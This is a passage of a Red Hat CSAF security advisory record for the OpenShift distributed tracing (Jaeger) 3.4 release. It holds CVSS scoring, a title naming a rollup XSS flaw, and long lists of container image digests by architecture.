3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "rollup: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS" } ] }
rhsa-2024_10917
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A new version of Red Hat OpenShift distributed tracing platform (Jaeger) has been released", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift distributed tracing platform based on Jaeger. Jaeger is a project inspired by Dapper and OpenZipkin. It is a distributed tracing system released as open source by Uber Technologies. It is used for monitoring and troubleshooting microservices-based distributed systems.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2024:10917", "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "external", "summary": "https://docs.redhat.com/en/documentation/openshift_container_platform/4.17/html/distributed_tracing/distributed-tracing-platform-jaeger", "url": "https://docs.redhat.com/en/documentation/openshift_container_platform/4.17/html/distributed_tracing/distributed-tracing-platform-jaeger" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10917.json" } ], "title": "Red Hat Security Advisory: Red Hat OpenShift distributed tracing platform (Jaeger) 3.4 release", "tracking": { "current_release_date": "2024-12-20T18:56:50+00:00", "generator": { "date": "2024-12-20T18:56:50+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2024:10917", "initial_release_date": "2024-12-10T11:04:35+00:00", "revision_history": [ { "date": "2024-12-10T11:04:35+00:00", "number": "1", "summary": "Initial version" }, { "date": "2024-12-10T11:04:35+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-20T18:56:50+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift distributed tracing 3.4", "product": { "name": "Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_distributed_tracing:3.4::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift distributed tracing" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3A3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256%3Ae65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3Afdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3A2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Abf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3A121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "amd64" }, { "branches": [ { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256%3A7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256%3A7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256%3A912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256%3A7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256%3Aaebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256%3Af2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256%3A4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } }, { "category": "product_version", "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "product": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "product_id": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256%3A59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt" } } } ], "category": "architecture", "name": "arm64" }, { "branches": [ { "category": "product_version", "name": 